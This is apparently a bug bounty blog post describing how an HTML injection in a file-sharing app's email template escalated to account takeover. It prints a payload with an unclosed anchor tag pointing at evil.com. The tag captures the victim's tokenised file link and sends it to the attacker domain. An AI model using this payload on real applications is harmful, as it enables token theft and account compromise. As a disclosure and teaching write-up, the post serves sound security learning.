https://hackerz.space/blogs/bug-bounty-tips/how-a-low-severity-html-injection-turned-into-full-account-takeover

From a Low-Severity HTML Injection to Full Account Takeove

In bug bounty hunting, some of the most critical vulnerabilities begin as issues that appear harmless. What looks like a low-severity finding can sometimes evolve into a full account compromise — if you keep digging.

In this article, I’ll walk through a real scenario where a simple HTML injection inside an email notification eventually led to a full account takeover.

The Initial Test

Late one night during a bug bounty session, I was testing a web application that included a file-sharing feature. Users were able to upload files and assign custom file names.

Naturally, the first step was to test for Cross-Site Scripting (XSS).

The initial payloads failed. Nothing rendered. The application appeared to properly escape user input.

To investigate further, I intercepted the request using Burp Suite and injected the following payload into the filename field: 

><h1>hey</h1>

When the file appeared in the application's interface, the payload was displayed only as plain text. No HTML rendering occurred and no script execution was possible.

At that point, it looked like a dead end.

A Small Detail That Changed Everything

While continuing to explore the interface, I noticed a “Share File” option. The feature allowed users to send the file to others via email.

Curious, I entered a random email address and clicked send.

A few seconds later, the email arrived.

This is where things became interesting.

Inside the email notification, the same payload appeared again — but this time it was rendered as HTML.

Instead of plain text, the injected HTML was interpreted directly by the email template.

At first glance, this looked like a typical HTML injection inside an email template, which is often considered low severity.

Most researchers would report it and move on.

Rethinking the Impact

Before closing the laptop for the night, one question came to mind:

What could be done with HTML injection inside an email?

The email contained a legitimate “View File” button that allowed recipients to open the shared file directly.

Importantly, this link automatically authenticated the user using a token embedded in the URL — meaning no login was required.

That opened the door to a potential escalation.

The Exploit

Instead of injecting visible HTML, I crafted a payload designed to manipulate the email’s link structure.

The following payload was inserted into the filename: 

<a href="https://evil.com/?link=

Notice that the href attribute is intentionally left unclosed.

Because the email template later inserted the legitimate file link immediately after the injected content, the real URL became appended to the malicious link.

As a result, the final link inside the email effectively looked like this: 

https://evil.com/?link=app.com/secrettoken...

When the victim clicked the View File button inside the email, their browser was redirected to the attacker’s domain while carrying the authenticated access token.

That token could then be captured and used to access the victim’s shared resources.

From HTML Injection to Account Takeover

What started as a simple HTML injection became significantly more dangerous due to the application’s authentication mechanism.

By capturing the authenticated token embedded in the link, an attacker could access protected resources and potentially compromise the victim’s account.

This chain of events turned a seemingly minor issue into a critical security vulnerability.

Key Takeaways

  • Always test where user input is rendered. Input may be sanitized in one context but not in another, such as email templates.
  • Email templates are often overlooked. Many applications escape input in the UI but forget to apply the same protections in emails.
  • Authentication links can introduce risk. Tokens embedded in URLs can become exposed through HTML manipulation.
  • Small bugs can become critical. The difference between a low-severity issue and a critical vulnerability often comes from deeper exploration.

Final Thoughts

Bug bounty hunting isn’t just about finding vulnerabilities — it’s about understanding how small weaknesses interact with application logic.

Sometimes the most impactful discoveries happen when you take a second look at something that initially seems insignificant.

The bugs you almost ignore today might be the ones worth investigating tomorrow. 👀

Learn more about Bug Bounty Hunting and Penetration Testing on my blog:

https://hackerz.space

Back to blog